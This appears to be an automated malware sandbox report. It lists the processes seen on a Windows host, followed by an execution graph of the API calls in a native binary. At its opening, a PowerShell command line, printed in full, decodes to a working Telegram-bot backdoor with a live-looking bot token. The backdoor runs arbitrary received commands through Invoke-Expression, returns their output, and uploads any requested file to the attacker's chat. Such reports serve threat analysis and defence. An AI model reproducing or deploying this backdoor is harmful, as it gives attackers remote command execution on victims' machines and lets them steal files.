                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e $ T o k e n   =   " 7 5 5 4 3 0 7 6 6 9 : A A E _ l n Q T Y S X v u s a K l k p N r v 2 D v Y u C 7 H h I 0 s 0 "  
 $ U R L   =   " h t t p s : / / a p i . t e l e g r a m . o r g / b o t { 0 } "   - f   $ T o k e n  
 $ l a s t I D   =   1 2 3  
 $ s l e e p T i m e   =   2  
 $ i d e n t i f i e r   =   - j o i n   ( ( 4 8 . . 5 7 )   |   G e t - R a n d o m   - C o u n t   5   |   %   { [ c h a r ] $ _ } )  
  
 f u n c t i o n   I n v o k e - B o t C m d   {  
         p a r a m   (  
                 $ c o m m a n d  
         )  
         t r y   {  
                 $ r e s u l t   =   I n v o k e - E x p r e s s i o n ( $ c o m m a n d )  
         }  
         c a t c h   {  
                 $ r e s u l t   =   $ E r r o r [ 0 ] . E x c e p t i o n  
         }  
         $ r e s   =   " [ $ i d e n t i f i e r ] % 0 D % 0 A "  
         $ r e s u l t   |   F o r E a c h - O b j e c t   { $ r e s   + =   [ s t r i n g ] $ _   +   " % 0 D % 0 A " }  
  
         i f ( $ r e s   - e q   " " ) {  
                 $ l a s t I D   =   $ u p d a t e i d  
                 c o n t i n u e  
         }  
         i f ( $ r e s . L e n g t h   - g t   4 0 9 5 ) {  
                 f o r   ( $ i   =   0 ;   $ i   - l t   $ r e s . L e n g t h   /   4 0 9 5 ;   $ i + + )   {  
                         $ b e g i n   =   $ i   *   4 0 9 5  
                         $ e n d   =   $ b e g i n   +   4 0 9 4  
                         i f ( $ e n d   - g t   $ r e s . L e n g t h ) {  
                                 $ e n d   =   $ r e s . L e n g t h  
                         }  
                         $ d a t a   =   " c h a t _ i d = $ f r o m & t e x t = "   +   $ r e s [ $ b e g i n . . $ e n d ]  
                         $ U R I   =   " $ U R L / s e n d M e s s a g e ? $ d a t a "  
                         I n v o k e - W e b R e q u e s t   - U r i   $ U R I   >   $ n u l l  
                 }  
         }   e l s e   {  
                 $ d a t a   =   " c h a t _ i d = $ f r o m & t e x t = $ r e s "    
                 $ U R I   =   " $ U R L / s e n d M e s s a g e ? $ d a t a "  
                 I n v o k e - W e b R e q u e s t   - U r i   $ U R I   >   $ n u l l  
         }  
 }  
  
 f u n c t i o n   I n v o k e - B o t D o w n l o a d   {  
         p a r a m   (  
                 $ F i l e P a t h  
         )  
         A d d - t y p e   - A s s e m b l y N a m e   S y s t e m . N e t . H t t p  
         $ F i e l d N a m e   =   ' d o c u m e n t '  
         $ h t t p C l i e n t H a n d l e r   =   N e w - O b j e c t   S y s t e m . N e t . H t t p . H t t p C l i e n t H a n d l e r  
         $ h t t p C l i e n t   =   N e w - O b j e c t   S y s t e m . N e t . H t t p . H t t p c l i e n t   $ h t t p C l i e n t H a n d l e r  
  
         $ F i l e S t r e a m   =   [ S y s t e m . I O . F i l e S t r e a m ] : : n e w ( $ F i l e P a t h ,   [ S y s t e m . I O . F i l e M o d e ] : : O p e n )  
         $ F i l e H e a d e r   =   [ S y s t e m . N e t . H t t p . H e a d e r s . C o n t e n t D i s p o s i t i o n H e a d e r V a l u e ] : : n e w ( ' f o r m - d a t a ' )  
         $ F i l e H e a d e r . N a m e   =   $ F i e l d N a m e  
         $ F i l e H e a d e r . F i l e N a m e   =   ( S p l i t - P a t h   $ F i l e P a t h   - l e a f )  
         $ F i l e C o n t e n t   =   [ S y s t e m . N e t . H t t p . S t r e a m C o n t e n t ] : : n e w ( $ F i l e S t r e a m )  
         $ F i l e C o n t e n t . H e a d e r s . C o n t e n t D i s p o s i t i o n   =   $ F i l e H e a d e r  
         $ F i l e C o n t e n t . H e a d e r s . C o n t e n t T y p e   =   [ S y s t e m . W e b . M i m e M a p p i n g ] : : G e t M i m e M a p p i n g ( $ F i l e P a t h )    
          
         $ M u l t i p a r t C o n t e n t   =   [ S y s t e m . N e t . H t t p . M u l t i p a r t F o r m D a t a C o n t e n t ] : : n e w ( )  
         $ M u l t i p a r t C o n t e n t . A d d ( $ F i l e C o n t e n t )  
          
         $ h t t p C l i e n t . P o s t A s y n c ( " $ U R L / s e n d D o c u m e n t ? c h a t _ i d = $ f r o m " ,   $ M u l t i p a r t C o n t e n t )   >   $ n u l l  
 }  
  
 w h i l e   ( $ t r u e )   {  
         t r y {  
                 $ i n M e s s a g e   =   I n v o k e - R e s t M e t h o d   - M e t h o d   G e t   - U r i   ( $ U R L   + ' / g e t U p d a t e s ? o f f s e t = '   +   ( $ l a s t I D   +   1 ) )   - E r r o r A c t i o n   S t o p  
         }  
         c a t c h   {  
                 S t a r t - S l e e p   $ ( G e t - R a n d o m   - M a x i m u m   1 0 )    
                 c o n t i n u e  
         }  
         $ i n M e s s a g e . r e s u l t   |   F o r E a c h - O b j e c t   {  
                 $ u p d a t e i d   =   $ _ . u p d a t e _ i d  
                 $ f r o m   =   $ _ . m e s s a g e . f r o m . i d  
                 $ c o m m a n d   =   [ S y s t e m . T e x t . E n c o d i n g ] : : U T F 8 . G e t S t r i n g ( [ S y s t e m . T e x t . E n c o d i n g ] : : U T F 8 . G e t B y t e s ( $ _ . m e s s a g e . t e x t ) )  
  
                 i f ( $ c o m m a n d . S u b s t r i n g ( 0 ,   6 )   - e q   " / s l e e p " ) {  
                         $ s l e e p T i m e   =   [ i n t ] $ c o m m a n d . S u b s t r i n g ( 7 )  
                 }  
                 e l s e i f ( $ c o m m a n d . S u b s t r i n g ( 0 ,   4 )   - e q   " / c m d " ) {  
                         $ c o m m a n d   =   $ c o m m a n d . S u b s t r i n g ( 5 )                          
                         I n v o k e - B o t C m d   - c o m m a n d   $ c o m m a n d  
                 }  
                 e l s e i f ( $ c o m m a n d . S u b s t r i n g ( 0 ,   9 )   - e q   " / d o w n l o a d " ) {  
                         $ F i l e P a t h   =   $ c o m m a n d . S u b s t r i n g ( 1 0 )          
                         I n v o k e - B o t D o w n l o a d   - F i l e P a t h   $ F i l e P a t h          
                 }  
                 e l s e   {  
                         $ c m d   =   $ c o m m a n d . S u b s t r i n g ( 1 ,   5 )  
                         i f ( $ i d e n t i f i e r   - e q   $ c m d ) {  
                                 $ c o m m a n d   =   $ c o m m a n d . S u b s t r i n g ( 7 )  
                                 I n v o k e - B o t C m d   - c o m m a n d   $ c o m m a n d  
                         }  
                         e l s e   {  
                                 W r i t e - H o s t   " S L E E P "  
                                 S t a r t - S l e e p   $ ( G e t - R a n d o m   - M a x i m u m   1 0 )  
                         }  
                 }  
                 $ l a s t I D   =   $ u p d a t e i d                
         }  
         S t a r t - S l e e p   - S e c o n d s   $ s l e e p T i m e  
 } 
                                                                                Imagebase:0x7ff7be880000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:6
                                                                                Start time:04:03:45
                                                                                Start date:14/01/2025
                                                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                Imagebase:0x7ff6413e0000
                                                                                File size:3'581'912 bytes
                                                                                MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:7
                                                                                Start time:04:03:45
                                                                                Start date:14/01/2025
                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                Imagebase:0x7ff7e52b0000
                                                                                File size:55'320 bytes
                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:8
                                                                                Start time:04:03:45
                                                                                Start date:14/01/2025
                                                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2116 --field-trial-handle=1724,i,10193653544518332854,3055548416538146672,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                Imagebase:0x7ff6413e0000
                                                                                File size:3'581'912 bytes
                                                                                MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:7.9%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:8%
                                                                                  Total number of Nodes:1369
                                                                                  Total number of Limit Nodes:32
                                                                                  execution_graph 16126 7ff73a3f3470 16127 7ff73a3f3493 16126->16127 16132 7ff73a3f353d 16127->16132 16134 7ff73a3fe9dc 16127->16134 16129 7ff73a3f7e70 _log10_special 8 API calls 16131 7ff73a3f3593 16129->16131 16130 7ff73a3f34b6 16130->16132 16133 7ff73a3fe3f4 37 API calls 16130->16133 16132->16129 16133->16132 16135 7ff73a3fea0a 16134->16135 16137 7ff73a3fea82 16135->16137 16139 7ff73a3fea2f 16135->16139 16136 7ff73a3ff65c _invalid_parameter_noinfo 37 API calls 16140 7ff73a3fea58 16136->16140 16141 7ff73a3fe8b4 16137->16141 16139->16136 16140->16130 16148 7ff73a3fe43c EnterCriticalSection 16141->16148 16272 7ff73a3f3a80 16273 7ff73a3f3ab7 16272->16273 16275 7ff73a3f3b32 16273->16275 16276 7ff73a3f3b4d 16273->16276 16282 7ff73a3f3ac7 16273->16282 16274 7ff73a3f7e70 _log10_special 8 API calls 16277 7ff73a3f3cdd 16274->16277 16290 7ff73a3fe150 16275->16290 16279 7ff73a3fe150 40 API calls 16276->16279 16285 7ff73a3f3b6d ctype 16279->16285 16280 7ff73a3f5f70 39 API calls 16280->16285 16281 7ff73a3f3c8f 16281->16282 16283 7ff73a3f3d57 16281->16283 16282->16274 16284 7ff73a3ff748 _invalid_parameter_noinfo_noreturn 37 API calls 16283->16284 16288 7ff73a3f3d5c 16284->16288 16285->16280 16285->16281 16286 7ff73a3fe150 40 API calls 16285->16286 16289 7ff73a3f3d0e 16285->16289 16286->16285 16287 7ff73a3fec48 39 API calls 16287->16289 16289->16281 16289->16287 16291 7ff73a3fe16c 16290->16291 16292 7ff73a3fe18a 16290->16292 16294 7ff73a4006a8 _set_fmode 11 API calls 16291->16294 16311 7ff73a3fe43c EnterCriticalSection 16292->16311 16295 7ff73a3fe171 16294->16295 16297 7ff73a3ff728 _invalid_parameter_noinfo 37 API calls 16295->16297 16308 7ff73a3fe17c 16297->16308 16308->16282 16315 7ff73a3f3680 16316 7ff73a3f36b3 16315->16316 16317 7ff73a3f4b30 76 API calls 16316->16317 16324 7ff73a3f370b 16316->16324 16319 7ff73a3f36d6 16317->16319 16318 7ff73a3f7e70 _log10_special 8 API calls 16320 7ff73a3f3779 16318->16320 16321 7ff73a3f36f6 16319->16321 16319->16324 16325 7ff73a3ff270 16319->16325 16321->16324 16329 7ff73a3fe868 16321->16329 16324->16318 16326 7ff73a3ff2a0 16325->16326 16327 7ff73a3ff000 73 API calls 16326->16327 16328 7ff73a3ff2b9 16327->16328 16328->16321 16330 7ff73a3fe891 16329->16330 16331 7ff73a3fe87c 16329->16331 16330->16331 16333 7ff73a3fe896 16330->16333 16332 7ff73a4006a8 _set_fmode 11 API calls 16331->16332 16334 7ff73a3fe881 16332->16334 16338 7ff73a4073a8 16333->16338 16336 7ff73a3ff728 _invalid_parameter_noinfo 37 API calls 16334->16336 16337 7ff73a3fe88c 16336->16337 16337->16324 16339 7ff73a4073d8 16338->16339 16342 7ff73a406eb4 16339->16342 16341 7ff73a4073f1 16341->16337 16343 7ff73a406ecf 16342->16343 16344 7ff73a406efe 16342->16344 16345 7ff73a3ff65c _invalid_parameter_noinfo 37 API calls 16343->16345 16352 7ff73a3fe43c EnterCriticalSection 16344->16352 16347 7ff73a406eef 16345->16347 16347->16341 13313 7ff73a3f8224 13338 7ff73a3f7f10 13313->13338 13316 7ff73a3f8370 13433 7ff73a3f8ab0 IsProcessorFeaturePresent 13316->13433 13317 7ff73a3f8240 __scrt_acquire_startup_lock 13319 7ff73a3f837a 13317->13319 13320 7ff73a3f825e 13317->13320 13321 7ff73a3f8ab0 7 API calls 13319->13321 13326 7ff73a3f827f __scrt_release_startup_lock 13320->13326 13346 7ff73a401ef0 13320->13346 13324 7ff73a3f8385 BuildCatchObjectHelperInternal 13321->13324 13323 7ff73a3f8283 13325 7ff73a3f8309 13350 7ff73a3f8bf8 13325->13350 13326->13323 13326->13325 13422 7ff73a4011d4 13326->13422 13328 7ff73a3f830e 13353 7ff73a401e3c 13328->13353 13335 7ff73a3f8331 13335->13324 13429 7ff73a3f8094 13335->13429 13339 7ff73a3f7f18 13338->13339 13340 7ff73a3f7f24 __scrt_dllmain_crt_thread_attach 13339->13340 13341 7ff73a3f7f31 13340->13341 13342 7ff73a3f7f2d 13340->13342 13440 7ff73a401d54 13341->13440 13342->13316 13342->13317 13348 7ff73a401f03 13346->13348 13347 7ff73a401f2a 13347->13326 13348->13347 13891 7ff73a3f8140 13348->13891 14021 7ff73a412940 13350->14021 13354 7ff73a40b8d8 66 API calls 13353->13354 13357 7ff73a401e4b 13354->13357 13355 7ff73a3f8316 13358 7ff73a3f28c0 13355->13358 13356 7ff73a40bc88 45 API calls 13356->13357 13357->13355 13357->13356 14023 7ff73a3f5db0 13358->14023 13360 7ff73a3f2933 14037 7ff73a3f6d0c 13360->14037 13364 7ff73a3f32b5 14212 7ff73a3f2850 13364->14212 13365 7ff73a3f2962 13365->13364 14058 7ff73a3f6af4 13365->14058 13369 7ff73a3f32c7 14219 7ff73a3f1660 13369->14219 13370 7ff73a3f2a52 13377 7ff73a3f32d9 13370->13377 14063 7ff73a3f51a0 13370->14063 13373 7ff73a3f32cd 14225 7ff73a3f19d0 13373->14225 13383 7ff73a3f19d0 2 API calls 13377->13383 13379 7ff73a3f32e3 13382 7ff73a3ff748 _invalid_parameter_noinfo_noreturn 37 API calls 13379->13382 13380 7ff73a3f2a30 13384 7ff73a3f6b1c __std_fs_convert_wide_to_narrow 5 API calls 13380->13384 13381 7ff73a3f2a78 __scrt_get_show_window_mode 13381->13379 14068 7ff73a3f4d20 13381->14068 13390 7ff73a3f32e9 13382->13390 13383->13379 13384->13370 13387 7ff73a3f2bc5 13387->13390 14117 7ff73a3f5cb0 13387->14117 14229 7ff73a3f1e40 13390->14229 13391 7ff73a3f2c25 14131 7ff73a3f5710 13391->14131 13392 7ff73a3f2bbc 14111 7ff73a3f4c20 13392->14111 13396 7ff73a3f2c63 13398 7ff73a3f5710 39 API calls 13396->13398 13397 7ff73a3f332d 14240 7ff73a3f9d80 13397->14240 13400 7ff73a3f2ca4 13398->13400 13404 7ff73a3f2cbf ctype 13400->13404 14175 7ff73a3f66c0 13400->14175 13401 7ff73a3f333d 13403 7ff73a3ff748 _invalid_parameter_noinfo_noreturn 37 API calls 13401->13403 13405 7ff73a3f3343 13403->13405 13407 7ff73a3f2db0 ctype 13404->13407 14189 7ff73a3f59a0 13404->14189 14145 7ff73a3f6410 13407->14145 13409 7ff73a3f2e46 13410 7ff73a3f59a0 39 API calls 13409->13410 13413 7ff73a3f2e59 13409->13413 13410->13413 13411 7ff73a3f3064 CreateProcessW 13412 7ff73a3f3102 WaitForSingleObject CloseHandle CloseHandle 13411->13412 13415 7ff73a3f3125 13411->13415 13412->13415 13413->13401 13413->13411 13414 7ff73a3f32b0 14207 7ff73a3ff748 13414->14207 13415->13414 14203 7ff73a3f40a0 13415->14203 13418 7ff73a3f3279 13420 7ff73a3f7e70 _log10_special 8 API calls 13418->13420 13419 7ff73a3f3203 13419->13414 13419->13418 13421 7ff73a3f328f 13420->13421 13427 7ff73a3f8c3c GetModuleHandleW 13421->13427 13423 7ff73a40120c 13422->13423 13424 7ff73a4011eb 13422->13424 14892 7ff73a4039b4 13423->14892 13424->13325 13428 7ff73a3f8c4d 13427->13428 13428->13335 13431 7ff73a3f80a5 13429->13431 13430 7ff73a3f80b5 13430->13323 13431->13430 13432 7ff73a3f9e78 7 API calls 13431->13432 13432->13430 13434 7ff73a3f8ad6 _invalid_parameter_noinfo_noreturn __scrt_get_show_window_mode 13433->13434 13435 7ff73a3f8af5 RtlCaptureContext RtlLookupFunctionEntry 13434->13435 13436 7ff73a3f8b1e RtlVirtualUnwind 13435->13436 13437 7ff73a3f8b5a __scrt_get_show_window_mode 13435->13437 13436->13437 13438 7ff73a3f8b8c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13437->13438 13439 7ff73a3f8bda _invalid_parameter_noinfo_noreturn 13438->13439 13439->13319 13441 7ff73a40bdfc 13440->13441 13442 7ff73a3f7f36 13441->13442 13452 7ff73a40b8d8 13441->13452 13458 7ff73a40b820 13441->13458 13473 7ff73a404e84 13441->13473 13442->13342 13446 7ff73a3f9e78 13442->13446 13447 7ff73a3f9e80 13446->13447 13448 7ff73a3f9e8a 13446->13448 13870 7ff73a3fa268 13447->13870 13448->13342 13453 7ff73a40b92a 13452->13453 13454 7ff73a40b8e5 13452->13454 13453->13441 13484 7ff73a404a00 13454->13484 13459 7ff73a40b843 13458->13459 13462 7ff73a40b84d 13459->13462 13868 7ff73a3fff30 EnterCriticalSection 13459->13868 13461 7ff73a40b8bf 13461->13441 13462->13461 13464 7ff73a3ffe88 BuildCatchObjectHelperInternal 45 API calls 13462->13464 13466 7ff73a40b8d7 13464->13466 13468 7ff73a40b92a 13466->13468 13470 7ff73a404a00 50 API calls 13466->13470 13468->13441 13471 7ff73a40b914 13470->13471 13472 7ff73a40b5b0 66 API calls 13471->13472 13472->13468 13869 7ff73a3fff30 EnterCriticalSection 13473->13869 13475 7ff73a404e94 13476 7ff73a40c144 43 API calls 13475->13476 13477 7ff73a404e9d 13476->13477 13479 7ff73a404c8c 45 API calls 13477->13479 13483 7ff73a404eab 13477->13483 13478 7ff73a3fff84 BuildCatchObjectHelperInternal LeaveCriticalSection 13480 7ff73a404eb7 13478->13480 13481 7ff73a404ea6 13479->13481 13480->13441 13482 7ff73a404d7c GetStdHandle GetFileType 13481->13482 13482->13483 13483->13478 13485 7ff73a404a11 FlsGetValue 13484->13485 13486 7ff73a404a2c FlsSetValue 13484->13486 13487 7ff73a404a26 13485->13487 13488 7ff73a404a1e 13485->13488 13486->13488 13489 7ff73a404a39 13486->13489 13487->13486 13490 7ff73a404a24 13488->13490 13545 7ff73a3ffe88 13488->13545 13527 7ff73a4062d4 13489->13527 13504 7ff73a40b5b0 13490->13504 13495 7ff73a404a66 FlsSetValue 13498 7ff73a404a84 13495->13498 13499 7ff73a404a72 FlsSetValue 13495->13499 13496 7ff73a404a56 FlsSetValue 13497 7ff73a404a5f 13496->13497 13534 7ff73a405ce8 13497->13534 13540 7ff73a4046dc 13498->13540 13499->13497 13505 7ff73a40b820 66 API calls 13504->13505 13506 7ff73a40b5e5 13505->13506 13706 7ff73a40b2b0 13506->13706 13511 7ff73a40b61b 13512 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 13511->13512 13513 7ff73a40b602 13512->13513 13513->13453 13514 7ff73a40b62a 13514->13514 13720 7ff73a40b954 13514->13720 13517 7ff73a40b726 13518 7ff73a4006a8 _set_fmode 11 API calls 13517->13518 13519 7ff73a40b72b 13518->13519 13522 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 13519->13522 13520 7ff73a40b781 13521 7ff73a40b7e8 13520->13521 13731 7ff73a40b0e0 13520->13731 13525 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 13521->13525 13522->13513 13523 7ff73a40b740 13523->13520 13526 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 13523->13526 13525->13513 13526->13520 13532 7ff73a4062e5 __std_fs_code_page 13527->13532 13528 7ff73a406336 13557 7ff73a4006a8 13528->13557 13529 7ff73a40631a HeapAlloc 13530 7ff73a404a48 13529->13530 13529->13532 13530->13495 13530->13496 13532->13528 13532->13529 13554 7ff73a400d10 13532->13554 13535 7ff73a405d1c 13534->13535 13536 7ff73a405ced HeapFree 13534->13536 13535->13488 13536->13535 13537 7ff73a405d08 GetLastError 13536->13537 13538 7ff73a405d15 Concurrency::details::SchedulerProxy::DeleteThis 13537->13538 13539 7ff73a4006a8 _set_fmode 9 API calls 13538->13539 13539->13535 13583 7ff73a4045b4 13540->13583 13597 7ff73a408b84 13545->13597 13560 7ff73a400d50 13554->13560 13566 7ff73a404aa4 GetLastError 13557->13566 13559 7ff73a4006b1 13559->13530 13565 7ff73a3fff30 EnterCriticalSection 13560->13565 13562 7ff73a400d5d 13563 7ff73a3fff84 BuildCatchObjectHelperInternal LeaveCriticalSection 13562->13563 13564 7ff73a400d22 13563->13564 13564->13532 13567 7ff73a404ae5 FlsSetValue 13566->13567 13568 7ff73a404ac8 13566->13568 13569 7ff73a404af7 13567->13569 13581 7ff73a404ad5 13567->13581 13568->13567 13568->13581 13571 7ff73a4062d4 __std_fs_code_page 5 API calls 13569->13571 13570 7ff73a404b51 SetLastError 13570->13559 13572 7ff73a404b06 13571->13572 13573 7ff73a404b24 FlsSetValue 13572->13573 13574 7ff73a404b14 FlsSetValue 13572->13574 13575 7ff73a404b42 13573->13575 13576 7ff73a404b30 FlsSetValue 13573->13576 13577 7ff73a404b1d 13574->13577 13578 7ff73a4046dc __std_fs_code_page 5 API calls 13575->13578 13576->13577 13579 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 13577->13579 13580 7ff73a404b4a 13578->13580 13579->13581 13582 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 13580->13582 13581->13570 13582->13570 13595 7ff73a3fff30 EnterCriticalSection 13583->13595 13631 7ff73a408b3c 13597->13631 13636 7ff73a3fff30 EnterCriticalSection 13631->13636 13746 7ff73a4006c8 13706->13746 13709 7ff73a40b2d0 GetOEMCP 13711 7ff73a40b2f7 13709->13711 13710 7ff73a40b2e2 13710->13711 13712 7ff73a40b2e7 GetACP 13710->13712 13711->13513 13713 7ff73a408e50 13711->13713 13712->13711 13714 7ff73a408e9b 13713->13714 13715 7ff73a408e5f __std_fs_code_page 13713->13715 13717 7ff73a4006a8 _set_fmode 11 API calls 13714->13717 13715->13714 13716 7ff73a408e82 HeapAlloc 13715->13716 13719 7ff73a400d10 std::_Facet_Register 2 API calls 13715->13719 13716->13715 13718 7ff73a408e99 13716->13718 13717->13718 13718->13511 13718->13514 13719->13715 13721 7ff73a40b2b0 47 API calls 13720->13721 13722 7ff73a40b981 13721->13722 13723 7ff73a40bad7 13722->13723 13725 7ff73a40b9be IsValidCodePage 13722->13725 13730 7ff73a40b9d8 __scrt_get_show_window_mode 13722->13730 13724 7ff73a3f7e70 _log10_special 8 API calls 13723->13724 13726 7ff73a40b71d 13724->13726 13725->13723 13727 7ff73a40b9cf 13725->13727 13726->13517 13726->13523 13728 7ff73a40b9fe GetCPInfo 13727->13728 13727->13730 13728->13723 13728->13730 13778 7ff73a40b3c8 13730->13778 13867 7ff73a3fff30 EnterCriticalSection 13731->13867 13747 7ff73a4006ec 13746->13747 13748 7ff73a4006e7 13746->13748 13747->13748 13749 7ff73a40492c __std_fs_code_page 45 API calls 13747->13749 13748->13709 13748->13710 13750 7ff73a400707 13749->13750 13754 7ff73a408a64 13750->13754 13755 7ff73a408a79 13754->13755 13756 7ff73a40072a 13754->13756 13755->13756 13762 7ff73a40d8c0 13755->13762 13758 7ff73a408ad0 13756->13758 13759 7ff73a408ae5 13758->13759 13761 7ff73a408af8 13758->13761 13759->13761 13775 7ff73a40b938 13759->13775 13761->13748 13763 7ff73a40492c __std_fs_code_page 45 API calls 13762->13763 13764 7ff73a40d8cf 13763->13764 13765 7ff73a40d91a 13764->13765 13774 7ff73a3fff30 EnterCriticalSection 13764->13774 13765->13756 13776 7ff73a40492c __std_fs_code_page 45 API calls 13775->13776 13777 7ff73a40b941 13776->13777 13779 7ff73a40b405 GetCPInfo 13778->13779 13788 7ff73a40b4fb 13778->13788 13784 7ff73a40b418 13779->13784 13779->13788 13780 7ff73a3f7e70 _log10_special 8 API calls 13781 7ff73a40b59a 13780->13781 13781->13723 13789 7ff73a408508 13784->13789 13787 7ff73a4089cc 55 API calls 13787->13788 13788->13780 13790 7ff73a4006c8 TranslateName 45 API calls 13789->13790 13791 7ff73a40854a 13790->13791 13809 7ff73a40a2e0 13791->13809 13793 7ff73a408587 13797 7ff73a3f7e70 _log10_special 8 API calls 13793->13797 13794 7ff73a408644 13794->13793 13799 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 13794->13799 13795 7ff73a408580 13795->13793 13795->13794 13796 7ff73a408e50 std::_Locinfo::_Locinfo_ctor 12 API calls 13795->13796 13800 7ff73a4085b0 std::_Locinfo::_Locinfo_ctor __scrt_get_show_window_mode 13795->13800 13796->13800 13798 7ff73a40867d 13797->13798 13804 7ff73a4089cc 13798->13804 13799->13793 13800->13794 13801 7ff73a40a2e0 _fread_nolock MultiByteToWideChar 13800->13801 13802 7ff73a408626 13801->13802 13802->13794 13803 7ff73a40862a GetStringTypeW 13802->13803 13803->13794 13805 7ff73a4006c8 TranslateName 45 API calls 13804->13805 13806 7ff73a4089f1 13805->13806 13812 7ff73a408698 13806->13812 13811 7ff73a40a2e9 MultiByteToWideChar 13809->13811 13813 7ff73a4086d9 13812->13813 13814 7ff73a40a2e0 _fread_nolock MultiByteToWideChar 13813->13814 13817 7ff73a408723 13814->13817 13815 7ff73a4089a1 13816 7ff73a3f7e70 _log10_special 8 API calls 13815->13816 13818 7ff73a4089af 13816->13818 13817->13815 13819 7ff73a408e50 std::_Locinfo::_Locinfo_ctor 12 API calls 13817->13819 13820 7ff73a408859 13817->13820 13822 7ff73a40875b std::_Locinfo::_Locinfo_ctor 13817->13822 13818->13787 13819->13822 13820->13815 13821 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 13820->13821 13821->13815 13822->13820 13823 7ff73a40a2e0 _fread_nolock MultiByteToWideChar 13822->13823 13824 7ff73a4087ce 13823->13824 13824->13820 13843 7ff73a40696c 13824->13843 13827 7ff73a408819 13827->13820 13830 7ff73a40696c __crtLCMapStringW 7 API calls 13827->13830 13828 7ff73a40886a 13829 7ff73a408e50 std::_Locinfo::_Locinfo_ctor 12 API calls 13828->13829 13831 7ff73a40893c 13828->13831 13832 7ff73a408888 std::_Locinfo::_Locinfo_ctor 13828->13832 13829->13832 13830->13820 13831->13820 13833 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 13831->13833 13832->13820 13834 7ff73a40696c __crtLCMapStringW 7 API calls 13832->13834 13833->13820 13835 7ff73a408908 13834->13835 13835->13831 13836 7ff73a408928 13835->13836 13837 7ff73a40893e 13835->13837 13851 7ff73a40a370 13836->13851 13838 7ff73a40a370 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 13837->13838 13840 7ff73a408936 13838->13840 13840->13831 13841 7ff73a408956 13840->13841 13841->13820 13842 7ff73a405ce8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 13841->13842 13842->13820 13854 7ff73a406400 13843->13854 13846 7ff73a4069b2 LCMapStringEx 13849 7ff73a406a43 13846->13849 13847 7ff73a406a11 13864 7ff73a406a58 13847->13864 13849->13820 13849->13827 13849->13828 13850 7ff73a406a1b LCMapStringW 13850->13849 13852 7ff73a40a394 WideCharToMultiByte 13851->13852 13855 7ff73a40645d 13854->13855 13862 7ff73a406458 __vcrt_FlsAlloc 13854->13862 13855->13846 13855->13847 13856 7ff73a40648d LoadLibraryExW 13858 7ff73a406562 13856->13858 13859 7ff73a4064b2 GetLastError 13856->13859 13857 7ff73a406582 GetProcAddress 13857->13855 13861 7ff73a406593 13857->13861 13858->13857 13860 7ff73a406579 FreeLibrary 13858->13860 13859->13862 13860->13857 13861->13855 13862->13855 13862->13856 13862->13857 13863 7ff73a4064ec LoadLibraryExW 13862->13863 13863->13858 13863->13862 13865 7ff73a406400 __crtLCMapStringW 5 API calls 13864->13865 13866 7ff73a406a86 __crtLCMapStringW 13865->13866 13866->13850 13871 7ff73a3fa277 13870->13871 13873 7ff73a3f9e85 13870->13873 13878 7ff73a3fd684 13871->13878 13874 7ff73a3fd410 13873->13874 13875 7ff73a3fd43b 13874->13875 13876 7ff73a3fd43f 13875->13876 13877 7ff73a3fd41e DeleteCriticalSection 13875->13877 13876->13448 13877->13875 13882 7ff73a3fd4ec 13878->13882 13888 7ff73a3fd5d6 TlsFree 13882->13888 13889 7ff73a3fd530 __vcrt_FlsAlloc 13882->13889 13883 7ff73a3fd55e LoadLibraryExW 13885 7ff73a3fd57f GetLastError 13883->13885 13886 7ff73a3fd5fd 13883->13886 13884 